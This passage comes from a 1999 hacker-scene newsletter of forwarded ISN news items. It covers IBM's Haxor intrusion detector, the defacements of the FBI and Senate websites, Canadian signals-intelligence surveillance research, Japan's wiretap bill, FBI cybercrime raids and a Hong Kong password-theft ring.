  6638.       http://www.zdnet.com/pcweek/stories/news/0,4153,2267089,00.html
  6639.       
  6640.       
  6641.       Hackers beware: IBM to sharpen Haxor
  6642.       By Jim Kerstetter, PC Week Online
  6643.       May 27 1999 4:49 PM ET
  6644.       
  6645.       
  6646.       Hackers beware: Haxor is watching you from its perch in IBM's wide-ranging
  6647.       security suite. 
  6648.       
  6649.       
  6650.       This fall, Haxor is due for a face lift, along with IBM's Boundary Server
  6651.       firewall. They are two components of IBM's FirstSecure suite of
  6652.       applications, which includes everything from intrusion detection software
  6653.       to anti-virus software in the company's wider SecureWay security strategy. 
  6654.       
  6655.       
  6656.       Haxor will gain several new features, including better scanning for
  6657.       stealth attacks, such as low-bandwidth hacks and coordinated attacks from
  6658.       different geographic points, and improved ability to detect mangled and
  6659.       overlapping packets, company officials said. IBM (NYSE:IBM) is also trying
  6660.       to improve Haxor's ability to filter out the white noise of regular
  6661.       network traffic, tuning it down enough so it can catch stealth attacks
  6662.       while not setting off frequent false alarms. 
  6663.       
  6664.       
  6665.       Haxor was developed at IBM's Global Security Analysis Lab, in Hawthorne,
  6666.       N.Y., said Dave Safford, manager at the lab. There are two kinds of
  6667.       intrusion detection applications: One is based on servers or hosts and
  6668.       looks for attacks on that individual system; the other is network-based
  6669.       and sniffs packets as they come into the network, trying to determine if
  6670.       an attack is taking place. 
  6671.       
  6672.       
  6673.       Haxor is network-based and can be found within IBM's FirstSecure suite as
  6674.       well as Tivoli Systems Inc.'s CrossSite network management suite. "There
  6675.       is an incredible amount of data that comes out of these things," Safford
  6676.       said. "It can be a real problem." 
  6677.       
  6678.       
  6679.       To solve the problem, Safford said, IBM has developed "dynamic
  6680.       sensitivity," which will be able to correlate the difference between the
  6681.       attacks and legitimate traffic. 
  6682.       
  6683.       
  6684.       Network administrators are particularly interested in integration with
  6685.       management tools from companies such as Tivoli. "That makes the most sense
  6686.       to me. I want to be able to manage this from one point," said Doug Mallow,
  6687.       network administrator at a West Coast bank. 
  6688.       
  6689.       
  6690.       Also this fall, the Boundary Server firewall will be more tightly
  6691.       integrated with the SecureSite Policy Director, said IBM officials. Using
  6692.       the Common Content Inspection specification that is now under development,
  6693.       Boundary Server should be able to improve on performance, essentially
  6694.       sharing packets of data with other content inspection applications such as
  6695.       Content Technology Inc.'s MIMESweeper for e-mail inspection and Finjan
  6696.       Software Ltd.'s SurfinGate mobile code-scanning software. 
  6697.       
  6698.       
  6699.       IBM in January unveiled its SecureWay strategy for Internet and network
  6700.       security. Like competing packages from Hewlett-Packard Co., SecureWay is
  6701.       made up of both home-grown and OEM applications. 
  6702.       
  6703.       
  6704.       IBM also has developed a Security Policy Director to tie together its
  6705.       security pieces. 
  6706.       
  6707.       
  6708.       IBM can be reached at (914) 499-1900 or www.ibm.com. 
  6709.       
  6710.       
  6711.       -o-
  6712.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  6713.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]   
  6714.             
  6715.       @HWA
  6716.       
  6717.  44.0 [ISN] Feds Fend Off HACK3RZ 
  6718.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6719.  
  6720.  
  6721.        Forwarded From: Simon Taplin <sticker@icon.co.za>
  6722.       
  6723.       
  6724.       Feds Fend Off HACK3RZ 
  6725.       You might want to resend any e-mails you fired off to the FBI or the U.S.
  6726.       Senate yesterday. Hackers shut down both Web sites in a two-for-one attack
  6727.       that online media outlets dug right into.
  6728.       
  6729.       
  6730.       News.com reported that the attackers' intent was to crash the FBI site,
  6731.       not intrude into its files. Are the perps international spies? Perhaps
  6732.       double agents? International anarchists? Most likely they're adolescents
  6733.       not old enough to drive, Alan Paller, director of research for the SANS
  6734.       (System Administration, Networking and Security) Institute told News.com's
  6735.       Paul Festa.
  6736.       
  6737.       
  6738.       ZDNet scored with colorful details that indicate Paller might be right. It
  6739.       ran with the story and reported that the Senate Web site, too, had been
  6740.       downed Thursday evening. But the level of threat appears more comic book
  6741.       than spy thriller, according to ZDNN reporter Joel Deane. Fbi.gov had been
  6742.       hacked by a group called Global Hell, and the nefarious culprits behind
  6743.       the Senate attack call themselves MAST3RZ 0F D0WNL0ADING, or M0D to their
  6744.       friends. Turns out M0D taunted the feds with the message they left
  6745.       plastered on senate.gov: "FBI vs. M0D in '99, BR1NG IT 0N!" ZDNet got into
  6746.       the story, going so far as to mirror the M0D hack and engage the
  6747.       assistance of CyberCrime's Luke Reiter.
  6748.       Hackers Deface Senate, Challenge FBI
  6749.       http://www.zdnet.com/zdnn/stories/news/0,4586,2267421,00.html?chkpt=hpqs014
  6750.       No Security Lapse in FBI Hack Attack
  6751.       http://www.news.com/News/Item/0,4,37138,00.html
  6752.       
  6753.       
  6754.       -o-
  6755.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  6756.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  6757.       
  6758.       @HWA     
  6759.       
  6760.  45.0 [ISN] High-tech snooping tools developed for spy agency
  6761.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6762.  
  6763.  
  6764.  
  6765.  
  6766.       Forwarded From: Putrefied Cow <waste@zor.hut.fi>
  6767.       Originally From: Anonymous <nobody@replay.com>
  6768.       Originally To: cypherpunks@toad.com
  6769.       
  6770.       
  6771.       High-tech snooping tools developed for spy agency
  6772.       The Vancouver Sun (May 24, 1999)
  6773.       Jim Bronskill Southam Newspapers
  6774.       
  6775.       
  6776.       OTTAWA -- Canada's electronic spy agency is quietly bankrolling the
  6777.       development of cutting-edge systems that can identify voices, analyze
  6778.       printed documents and zero in on conversations about specific topics. 
  6779.       
  6780.       
  6781.       Documents show the Communications Security Establishment has enlisted the
  6782.       help of several leading Canadian research institutes to devise
  6783.       state-of-the-art snooping tools. 
  6784.       
  6785.       
  6786.       CSE, an agency of the defence department, collects and processes
  6787.       telephone, fax and computer communications of foreign states, corporations
  6788.       and individuals. The federal government uses the intelligence gleaned from
  6789.       the data to support troops abroad, catch terrorists and further Canada's
  6790.       economic goals. 
  6791.       
  6792.       
  6793.       CSE and counterpart agencies in the United States, Britain, Australia and
  6794.       New Zealand share intercepted communications of interest with one another,
  6795.       effectively creating a global surveillance web, according to intelligence
  6796.       experts. 
  6797.       
  6798.       
  6799.       CSE's interest in high-tech devices that help locate specific
  6800.       conversations and documents is a clear indication the five-member alliance
  6801.       collects and sifts large volumes of civilian traffic, said Bill Robinson,
  6802.       a researcher in Waterloo, Ont., who has long studied the spy agencies. 
  6803.       
  6804.       
  6805.       "This technology is needed to process vast communications streams when
  6806.       you're hunting for nuggets within it." 
  6807.       
  6808.       
  6809.       Robinson said the devices have legitimate uses, but hold "potentially
  6810.       frightening" implications for people's privacy as the technology advances. 
  6811.       
  6812.       
  6813.       The Centre for Pattern Recognition and Machine Intelligence, located at
  6814.       Concordia University in Montreal, received $355,000 to develop two systems
  6815.       for CSE that automatically analyze printed documents, such as faxes, once
  6816.       they are digitally captured in a computer data bank. 
  6817.       
  6818.       
  6819.       The first system, completed early last year, quickly determines the
  6820.       language of a document, said the centre's C. Y. Suen. 
  6821.       
  6822.       
  6823.       "Some humans may have problems in distinguishing Spanish from Portuguese,
  6824.       for example, or Spanish from Italian," he said. "So what we have developed
  6825.       is a system that can do it automatically." 
  6826.       
  6827.       
  6828.       The second device electronically searches captured documents for distinct
  6829.       features, including logos, photos, text or signatures. 
  6830.       
  6831.       
  6832.       Combining the two systems enables a user, for example, to search a data
  6833.       bank for Japanese documents containing photos, or Russian faxes with
  6834.       signatures. 
  6835.       
  6836.       
  6837.       Records obtained by Southam News under the Access to Information Act show
  6838.       CSE commissioned several other projects during the last two years. They
  6839.       include: 
  6840.       
  6841.       
  6842.       - An $84,981 contract with the University of Waterloo in Ontario for the
  6843.       "development of multilingual computer speech recognition systems." 
  6844.       
  6845.       
  6846.       - A $115,000 agreement with the University of Quebec at Chicoutimi to
  6847.       research "speaker identification" procedures. 
  6848.       
  6849.       
  6850.       - Work by the Centre de Recherche Informatique de Montreal on "topic
  6851.       spotting" -- a means of identifying the subject of a conversation. The
  6852.       $150,393 contract was the most recent of several awarded to CRIM. 
  6853.       
  6854.       
  6855.       CSE spokesman Kevin Mills did not provide information on specific goals of
  6856.       the projects, but allowed: "In general, any research that we're funding
  6857.       has some kind of interest for CSE." 
  6858.       
  6859.       
  6860.       The agency has been working on voice and phrase-detection systems for at
  6861.       least a decade. The documents, however, show the research continues, with
  6862.       some devices yet to be perfected. 
  6863.       
  6864.       
  6865.       CSE and its four international partner agencies use computers capable of
  6866.       recognizing intercepted messages containing specified names, addresses,
  6867.       telephone numbers and other key words or numbers, says a new report on
  6868.       surveillance technology, by Scottish researcher Duncan Campbell. 
  6869.       
  6870.       
  6871.       However, Campbell found the agencies lack systems for homing in on
  6872.       conversations featuring particular words. 
  6873.       
  6874.       
  6875.       CSE would have trouble picking out a phone call with the words
  6876.       "assassination" or "revolution" because the speech recognition systems
  6877.       developed to date cannot instantly recognize an unknown person's voice
  6878.       traits. 
  6879.       
  6880.       
  6881.       "The key problem, which is familiar to human listeners, is that a single
  6882.       word heard on its own can easily be misinterpreted, whereas in continuous
  6883.       speech the meaning may be deduced from surrounding words,"  says
  6884.       Campbell's report. 
  6885.       
  6886.       
  6887.       -=-=-=-=-
  6888.       
  6889.       
  6890.       Spy agency developing powerful snoop tools
  6891.       
  6892.       
  6893.       May 24, 1999
  6894.       
  6895.       
  6896.       By JIM BRONSKILL Southam Newspapers
  6897.       
  6898.       
  6899.       OTTAWA - Canada's electronic spy agency is quietly bankrolling the
  6900.       development of cutting-edge systems that can identify voices, analyze
  6901.       printed documents and zero in on conversations about specific topics. 
  6902.       Documents show the Communications Security Establishment has enlisted the
  6903.       help of several leading Canadian research institutes to devise
  6904.       state-of-the-art snooping tools. 
  6905.       
  6906.       
  6907.       CSE, an agency of the Defence Department, collects and processes
  6908.       telephone, fax and computer communications of foreign states, corporations
  6909.       and individuals. The federal government uses the intelligence gleaned from
  6910.       the data to support troops abroad, catch terrorists and further Canada's
  6911.       economic goals. 
  6912.       
  6913.       
  6914.       CSE and counterpart agencies in the United States, Britain, Australia and
  6915.       New Zealand share intercepted communications of interest with one another,
  6916.       effectively creating a global surveillance web, according to intelligence
  6917.       experts. 
  6918.       
  6919.       
  6920.       CSE's interest in high-tech devices that help locate specific
  6921.       conversations and documents is a clear indication the five-member alliance
  6922.       collects and sifts large volumes of civilian traffic, said Bill Robinson,
  6923.       a researcher in Waterloo, Ont., who has long studied the spy agencies. 
  6924.       
  6925.       
  6926.       "This technology is needed to process vast communications streams when
  6927.       you're hunting for nuggets within it." 
  6928.       
  6929.       
  6930.       Robinson said the devices have legitimate uses, but hold "potentially
  6931.       frightening" implications for people's privacy as the technology advances. 
  6932.       
  6933.       
  6934.       "They'll be able to do things they never could've done in the past." 
  6935.       
  6936.       
  6937.       The Centre for Pattern Recognition and Machine Intelligence, located at
  6938.       Concordia University in Montreal, received $355,000 to develop two systems
  6939.       for CSE that automatically analyze printed documents, such as faxes, once
  6940.       they are digitally captured in a computer data bank. 
  6941.       
  6942.       
  6943.       The first system, completed early last year, quickly determines the
  6944.       language of a document, said the centre's C. Y. Suen. 
  6945.       
  6946.       
  6947.       "Some humans may have problems in distinguishing Spanish from Portuguese,
  6948.       for example, or Spanish from Italian," he said. "So what we have developed
  6949.       is a system that can do it automatically." 
  6950.       
  6951.       
  6952.       The second device electronically searches captured documents for distinct
  6953.       features, including logos, photos, text or signatures. 
  6954.       
  6955.       
  6956.       Combining the two systems enables a user, for example, to search a data
  6957.       bank for Japanese documents containing photos, or Russian faxes with
  6958.       signatures. 
  6959.       
  6960.       
  6961.       Records obtained by Southam News under the Access to Information Act show
  6962.       CSE commissioned several other projects during the last two years. They
  6963.       include: 
  6964.       
  6965.       
  6966.       (*) An $84,981 contract with the University of Waterloo in Ontario for the
  6967.       "development of multilingual computer speech recognition systems." 
  6968.       
  6969.       
  6970.       (*) A $115,000 agreement with the University of Quebec at Chicoutimi to
  6971.       research "speaker identification" procedures. 
  6972.       
  6973.       
  6974.       (*) Work by the Centre de Recherche Informatique de Montreal on "topic
  6975.       spotting" - a means of identifying the subject of a conversation. The
  6976.       $150,393 contract was the most recent of several awarded to CRIM. 
  6977.       
  6978.       
  6979.       CSE spokesman Kevin Mills did not provide information on specific goals of
  6980.       the projects, but allowed: "In general, any research that we're funding
  6981.       has some kind of interest for CSE." 
  6982.       
  6983.       
  6984.       The agency has been working on voice- and phrase-detection systems for at
  6985.       least a decade. The documents, however, show the research continues, with
  6986.       some devices yet to be perfected. 
  6987.       
  6988.       
  6989.       CSE and its four international partner agencies use computers capable of
  6990.       recognizing intercepted messages containing specified names, addresses,
  6991.       telephone numbers and other key words or numbers, says a new report on
  6992.       surveillance technology, by Scottish researcher Duncan Campbell. 
  6993.       
  6994.       
  6995.       However, Campbell found the agencies lack systems for homing in on
  6996.       conversations featuring particular words. 
  6997.       
  6998.       
  6999.       For example, CSE would have trouble picking out a phone call with the
  7000.       words "assassination" or "revolution" because the speech recognition
  7001.       systems developed to date cannot instantly recognize an unknown person's
  7002.       individual voice traits. 
  7003.       
  7004.       
  7005.       "The key problem, which is familiar to human listeners, is that a single
  7006.       word heard on its own can easily be misinterpreted, whereas in continuous
  7007.       speech the meaning may be deduced from surrounding words,"  says
  7008.       Campbell's report. 
  7009.       
  7010.       
  7011.       Montreal's CRIM is trying to get around the problem by devising the "topic
  7012.       spotting" system, says the report. 
  7013.       
  7014.       
  7015.       In addition, intelligence agencies are using systems that recognize the
  7016.       "voiceprint" or speech pattern of targeted individuals, though the
  7017.       technology is not yet fully reliable. 
  7018.       
  7019.       
  7020.       [end]
  7021.       
  7022.       
  7023.       
  7024.       -o-
  7025.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7026.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7027.       
  7028.       @HWA     
  7029.       
  7030.       
  7031.  46.0 [ISN] Privacy issues have taken center stage 
  7032.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7033.  
  7034.        Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
  7035.       
  7036.       
  7037.       http://www.wired.com/news/print_version/business/story/19973.html?wnpg=all
  7038.       
  7039.       
  7040.       (Wired News) TOKYO [6.2.99] -- Privacy issues have taken center stage as
  7041.       Japan prepares to enact legislation allowing the police to eavesdrop on
  7042.       phone calls, intercept fax and computer transmissions, and read email.
  7043.       The draconian measures are ostensibly intended to help law enforcement
  7044.       halt premeditated murders, trafficking in drugs and guns, and smuggling of
  7045.       illegal aliens into Japan. 
  7046.       
  7047.       
  7048.       At least that's what a bill cobbled together by the country's coalition
  7049.       government says.
  7050.       
  7051.       
  7052.       The reality could be far more intrusive, especially after investigators
  7053.       receive an official green light to comb through private correspondence and
  7054.       communications.
  7055.       Japanese citizens' groups -- a hodgepodge of activists with little actual
  7056.       influence over policy decisions -- have decried the wiretapping
  7057.       legislation as a gross invasion of privacy, and opposition politicians
  7058.       boycotted a vote on the legislation last Friday. But the government
  7059.       insists that what Japan needs to restore public order is less civil
  7060.       liberty and more Big Brother. 
  7061.       
  7062.       
  7063.       People here are scared. Crime -- once unthinkable in Japan -- is on the
  7064.       rise. The country's yakuza racketeers are growing increasingly bolder in
  7065.       their schemes as nearly a full decade of recession eats away at
  7066.       traditional revenue sources, such as payoffs from companies and corrupt
  7067.       politicians.
  7068.       For law-enforcement authorities, the trouble began back in 1995 when Aum
  7069.       Shinrikyo cultists released sarin gas in the Tokyo subway, killing a dozen
  7070.       people. The cops simply never saw the attack coming, and have been
  7071.       agitating for greater surveillance powers as a means of preventing such
  7072.       nastiness from happening again.
  7073.       Wiretapping is a convenient shortcut for investigators. And, as the
  7074.       pervasive eavesdropping of former East Bloc countries made undeniably
  7075.       clear, once authorities start listening it's a hard habit to break.
  7076.       
  7077.       
  7078.       Yozo Marutake, a former senior executive with a manufacturer of hearing
  7079.       aids called Rion, said last week that the Japanese police have been
  7080.       bugging phones for decades. How does he know this? Because his company
  7081.       sold the cops all their surveillance gear, and had done so since first
  7082.       being approached by authorities in 1957, he said.
  7083.       
  7084.       
  7085.       So why would the Japanese police now be seeking legal backing for their
  7086.       electronic skulking? One reason might have to do with charges from an
  7087.       opposition politician last year that his phone had been bugged. The courts
  7088.       upheld the politician's claims, although the cops never actually admitted
  7089.       being behind the incident.
  7090.       
  7091.       
  7092.       The Internet undoubtedly will be a low priority at first for Japan's
  7093.       snoops, but this will change as more people, criminals included, go
  7094.       online. For now, it looks like the cops are still unsure how to proceed
  7095.       where matters of cyberspace are concerned.
  7096.       
  7097.       
  7098.       Police last week raided the Sapporo home of an 18-year-old who had posted
  7099.       a bunch of hit tunes on his home page using the MP3 compression format.
  7100.       The teen, needless to say, hadn't worked out copyright issues in advance
  7101.       with related Japanese recording companies.
  7102.       
  7103.       
  7104.       Police didn't reveal how they learned about the song-laden site. But they
  7105.       said they moved quickly to shut things down after concluding that illegal
  7106.       actions were being perpetrated. 
  7107.       
  7108.       
  7109.       This only took them three months of monitoring downloads to figure out.
  7110.       
  7111.       
  7112.       -o-
  7113.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7114.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7115.       
  7116.       @HWA     
  7117.       
  7118.  47.0 [ISN] Whitehouse to punish Hackers
  7119.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7120.  
  7121.       
  7122.       Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
  7123.       
  7124.       
  7125.       http://www.news.com/News/Item/0,4,37257,00.html
  7126.       
  7127.       
  7128.       (News.com) [6.1.99] WASHINGTON--Annoyed by a recent wave of attacks
  7129.       against official U.S. government Web sites, the White House today warned
  7130.       hackers who target federal Web sites that they will be caught and
  7131.       punished.
  7132.       "There's a government-wide effort to make sure that our computer systems
  7133.       remain secure," White House Press Secretary Joe Lockhart said in a
  7134.       briefing. "For those who think that this is some sort of sport, I think
  7135.       [it will be] less fun when the authorities do catch up with them...and
  7136.       these people are prosecuted," he said.
  7137.       To protect against attacks that in recent days and weeks have disabled
  7138.       sites run by the Energy Department, the FBI, the Senate, the Interior
  7139.       Department, and the White House, the Defense Department said it planned to
  7140.       shut down its Web site for a short time today, said Ken Bacon, the
  7141.       Pentagon's chief spokesman.
  7142.       "This is much more protective than reactive," Bacon said. "It's looking to
  7143.       the future to prevent the types of problems that the other agencies" have
  7144.       experienced in recent weeks on their sites, he said. 
  7145.       
  7146.       
  7147.       Attacking U.S. government Web sites is becoming an increasingly popular
  7148.       tool of people angry with the Clinton administration and its agencies.
  7149.       
  7150.       
  7151.       Last week hackers responded to a six-state FBI sweep of about 20 suspected
  7152.       hackers by attacking several government Internet locations, forcing the
  7153.       FBI, the Interior Department, and the U.S. Senate to temporarily shut down
  7154.       their Web sites.
  7155.       
  7156.       
  7157.       After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from
  7158.       China attacked a handful of U.S. government sites, including one
  7159.       maintained by the Energy Department. In an unrelated incident, the
  7160.       official White House site was shut down briefly because of an attempt to
  7161.       tamper with it by unidentified hackers, officials said. 
  7162.       
  7163.       
  7164.       In recent years the Justice Department's site was shut down once by
  7165.       hackers who put Nazi swastikas on its home page, and hackers forced the
  7166.       CIA to shut down its site after they changed the name from "Central
  7167.       Intelligence Agency" to "Central Stupidity Agency."
  7168.       
  7169.       
  7170.       With many U.S. government sites under attack, computer security experts
  7171.       are bracing for what could be a month full of additional Internet hacking
  7172.       incidents.
  7173.       
  7174.       
  7175.       Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February
  7176.       1995, will demonstrate in 14 U.S. cities Friday, seeking his release to a
  7177.       halfway house and an easy probation when he is sentenced on June 14. 
  7178.       
  7179.       
  7180.       Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud,
  7181.       computer fraud, and illegal interception of a wire communication.
  7182.       Federal officials said he impersonated an employee of Finland-based Nokia
  7183.       Mobile Phones to steal software worth $240,000. He also stole software
  7184.       from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun
  7185.       Microsystems, federal officials said.
  7186.       
  7187.       
  7188.       Supporters of Mitnick say the four years Mitnick has spent in jail
  7189.       awaiting trial is a harsher term than for many people convicted of violent
  7190.       crimes like robbery and assault. Their protest Friday will be seeking a
  7191.       more lenient sentence.
  7192.       
  7193.       
  7194.       The U.S. attorney for the Central District of California said Mitnick will
  7195.       be sentenced to 46 months in prison on June 14 as part of his plea bargain
  7196.       agreement with the government.
  7197.       
  7198.       
  7199.       Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie,
  7200.       also will be obliged to pay the victims of his crimes from any profits he
  7201.       makes from books or movies about his life, a spokesman for the U.S.
  7202.       attorney's office said.
  7203.       
  7204.       
  7205.       While hacking incidents may not be part of Friday's nationwide protest,
  7206.       there may be a surge in attacks across the Internet if Mitnick's sentence
  7207.       is perceived as too stiff, said John Vranesevich, the founder and director
  7208.       of AntiOnline.
  7209.       
  7210.       
  7211.       "Hackers attack when they're mad about something. The demonstration Friday
  7212.       will be an attempt to educate," said Vranesevich. "However, if Kevin
  7213.       Mitnick is put in jail, there very well could be more attacks after that." 
  7214.       
  7215.       
  7216.       Still, other experts said Internet sites should upgrade their security
  7217.       against possible attack before Friday.
  7218.       
  7219.       
  7220.       "Given the timing, it probably would be a good idea to be more on guard
  7221.       than usual," said Jevon Jaconi, the district attorney of Kewaunee County,
  7222.       Wisconsin, and an expert in the developing field of cyberspace law.
  7223.       
  7224.       
  7225.       Between 70 percent and 80 percent of all Internet hacking attacks come on
  7226.       systems that have not updated their security codes, routinely sent by
  7227.       computer manufacturers and network administrators, Jaconi said.
  7228.       
  7229.       
  7230.       The best way to prevent hacking attacks in the future is to heed those
  7231.       security warnings and implement the needed changes, he said.
  7232.       
  7233.       
  7234.       -o-
  7235.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7236.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7237.       
  7238.       @HWA     
  7239.       
  7240.  48.0 [ISN] Federal Cybercrime unit hunts for hackers
  7241.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7242.  
  7243.       
  7244.       [Moderator: This article will be going on the Errata site soon. This
  7245.       contains a wide variety of errors regarding the role and actions of John
  7246.       Vranesevich and AntiOnline. Mr. Richtel chose to believe JV at face
  7247.       value, and apparently did not challenge anything he said.]
  7248.       
  7249.       
  7250.       
  7251.       http://www.nytimes.com/library/tech/99/mo/biztech/articles/02hack.html
  7252.       
  7253.       
  7254.       June 2, 1999
  7255.       Federal Cybercrime Unit Hunts for Hackers
  7256.       By MATT RICHTEL  
  7257.       
  7258.       
  7259.       Raids by agents of the Federal Bureau of Investigation last week against
  7260.       several suspected computer hackers are part of a new Government cybercrime
  7261.       unit's crackdown against illegal tampering with computer networks and Web
  7262.       sites, a Federal prosecutor said Tuesday.
  7263.       
  7264.       
  7265.       The raids prompted a counteroffensive in which disparate hacker groups
  7266.       took responsibility for bringing down additional corporate and Government
  7267.       sites, including the F.B.I.'s public information site.
  7268.       
  7269.       
  7270.       The events escalated a longstanding game of tit-for-tat between pranksters
  7271.       using personal computers and a newly galvanized Federal police force stung
  7272.       by recent attacks on some of the Government's high-level Web sites.
  7273.       
  7274.       
  7275.       Paul E. Coggins, the United States Attorney in Dallas who is overseeing
  7276.       the effort, said yesterday that Federal prosecutors had issued 16 warrants
  7277.       in 12 jurisdictions after a yearlong investigation, but had not yet
  7278.       charged anyone with a crime.
  7279.       
  7280.       
  7281.       The investigation is part of the Government's new, Dallas-based cybercrime
  7282.       task force, which includes the F.B.I., the Secret Service, the United
  7283.       States Attorney's Office and the Defense Department, Coggins said.
  7284.       
  7285.       
  7286.       "It's probably the most far-reaching investigation of its kind," he said.
  7287.       "It's an investigation with national and international implications."
  7288.       
  7289.       
  7290.       Coggins declined to elaborate or to say whether the targets of the
  7291.       investigation were considered to be part of a conspiracy.
  7292.       
  7293.       
  7294.       Don K. Clark, a special F.B.I. agent in Houston, said the activities under
  7295.       investigation included stealing and misusing credit card numbers and
  7296.       computer passwords.
  7297.       
  7298.       
  7299.       Two of those who were raided by the bureau's agents last Wednesday said
  7300.       one connection between some of the targets was that they knew one another
  7301.       from various discussion groups in an Internet chat forum called Internet
  7302.       Relay Chat. The participants said that the talk sometimes revolved around
  7303.       hacking techniques but that they were not involved in any general hacking
  7304.       conspiracy with other members of the discussion groups.
  7305.       
  7306.       
  7307.       "I have never defaced any Web pages or taken out any major sites," said
  7308.       Paul Maidman, 18, of Waldwick, N.J., one of those who were raided. 
  7309.       
  7310.       
  7311.       Referring to proprietary computer systems, he said: "I got into other
  7312.       servers. I'd look around, read some E-mail, and that would be it."
  7313.       
  7314.       
  7315.       Maidman said he was awakened last Wednesday morning by five or six armed
  7316.       F.B.I. agents surrounding a living room couch where he slept. He said the
  7317.       agents confiscated a computer, some diskettes, CD-ROM's and other computer
  7318.       paraphernalia.
  7319.       
  7320.       
  7321.       Two Internet service providers have also received requests for
  7322.       documentation in connection with the case. The requests, parts of which
  7323.       have been posted on the Internet, seek information about dozens of
  7324.       hackers, hacker groups and software used by hackers.
  7325.       
  7326.       
  7327.       John Vranesevich, who operates the Anti-Online Web site, which chronicles
  7328.       hacker activity, said the information requested from Internet service
  7329.       providers involved software tools, computer files and aliases pertaining
  7330.       to hacker activities.
  7331.       
  7332.       
  7333.       Vranesevich said several of the aliases actually represented software
  7334.       programs called "bots," which are posted in chat rooms as automated
  7335.       monitors but may have been mistaken by F.B.I. agents for human
  7336.       participants.
  7337.       
  7338.       
  7339.       "Anything that has to do with hackers they're going after," he said. "I'm
  7340.       not going to call this a witch hunt, but it's an uninformed
  7341.       investigation."
  7342.       
  7343.       
  7344.       Meanwhile, hacker groups continued attacks on corporate and Government
  7345.       computers, in some cases making sites inaccessible and, in others, taking
  7346.       over sites with their own messages, some of them profane. The F.B.I. site,
  7347.       taken down last week, remained inaccessible yesterday.
  7348.       
  7349.       
  7350.       One hacker group, which calls itself F0rpaxe, says it is based in Portugal
  7351.       and takes responsibility for "massive attacks" on various Web sites, sent
  7352.       a statement to Anti-Online saying, "If the F.B.I. doesn't stop we won't,
  7353.       and we can start destroying."
  7354.       
  7355.       
  7356.       -o-
  7357.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  7358.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  7359.       
  7360.       @HWA
  7361.       
  7362.       
  7363.  49.0 [ISN] Hong Kong Computer Hacking Syndicate Smashed
  7364.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7365.  
  7366.  
  7367.  
  7368.       www.infowar.com
  7369.       6/1/99
  7370.       Hong Kong Computer Hacking Syndicate Smashed
  7371.       
  7372.       
  7373.       HONG KONG, CHINA, 1999 MAY 30 (Newsbytes) -- By Staff Writer, IT Daily.
  7374.       Hong Kong police arrested an organized group of computer hackers last
  7375.       week, seizing computers and CD-ROMS, after a five-month hunt. 
  7376.       
  7377.       
  7378.       The arrests marked the first time an organized hacking group has been
  7379.       arrested in Hong Kong. 
  7380.       
  7381.       
  7382.       Acting on complaints from several local Internet service providers (ISPs)
  7383.       that the accounts of their clients might had been hacked late last year,
  7384.       officers from the Computer Crime Section of the Commercial Crime Bureau
  7385.       (CCB) launched investigations in January, culminating in a series of raids
  7386.       last week. 
  7387.       
  7388.       
  7389.       Two men, including a suspected hacker and a middleman were arrested in the
  7390.       first two days of the operation starting on May 20. In all, ten men were
  7391.       arrested. The suspects were aged between 16 and 21 and included three
  7392.       hackers, six buyers of the passwords and a middleman who arranged the
  7393.       sales. 
  7394.       
  7395.       
  7396.       Operating as a syndicate, the hackers stole the passwords and personal
  7397.       information on legitimate Internet account holders and sold them. 
  7398.       
  7399.       
  7400.       The principal hacker collected information on over 200 accounts and sold
  7401.       them through a middleman to users who wanted cheap, unlimited Internet
  7402.       access. Hilton Chan, head of the Computer Crime Section of the CCB told
  7403.       ITDaily.com that most of the end-users wanted to use the time to access
  7404.       online gaming sites. 
  7405.       
  7406.       
  7407.       According to police, the buyers paid HK$350 (US$45.13) each for a month's
  7408.       access, and clocked up Internet time worth between HK$2,000 and HK$3,000
  7409.       ($257.88 and $386.82) each. Most local ISPs charge under HK$150 ($19.34)
  7410.       per month for unlimited usage, but users must still pay HK$1.98 ($0.26)
  7411.       per hour for the Public Non-Exclusive Telecommunications (PNETS) license
  7412.       fee. 
  7413.       
  7414.       
  7415.       The middleman communicated with its clients through telephone and the ICQ
  7416.       online cmessaging service. 
  7417.       
  7418.       
  7419.       Investigations also showed that one of the hackers set up a Web page on
  7420.       the Internet offering pirate music CDs for sale. Each disk featured over
  7421.       100 songs downloaded from the Internet or dubbed from copyrighted computer
  7422.       disks. The disks were selling for HK$88 ($11.35) each or HK$160 ($20.63)
  7423.       for two copies. 
  7424.       
  7425.       
  7426.       Ten sets computers and peripheral equipment believed to be used in the
  7427.       hacking and about 700 CD-ROMs were seized during the operation. 
  7428.       
  7429.       
  7430.       Chan said that the maximum penalty is five years' imprisonment. He also
  7431.       advised users to protect themselves against hackers. "Don't store your
  7432.       password on the computer terminal, and change your password more
  7433.       frequently," advised Chan. He also advised users not to use easy to
  7434.       replicate passwords and be careful when downloading from the Web. "If you
  7435.       don't know the source of it don't download it," Chan said. 
  7436.       
  7437.       
  7438.       Exchange Rate: $1 = HK$7.75
  7439.       
  7440.       
  7441.       -o-
  7442.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
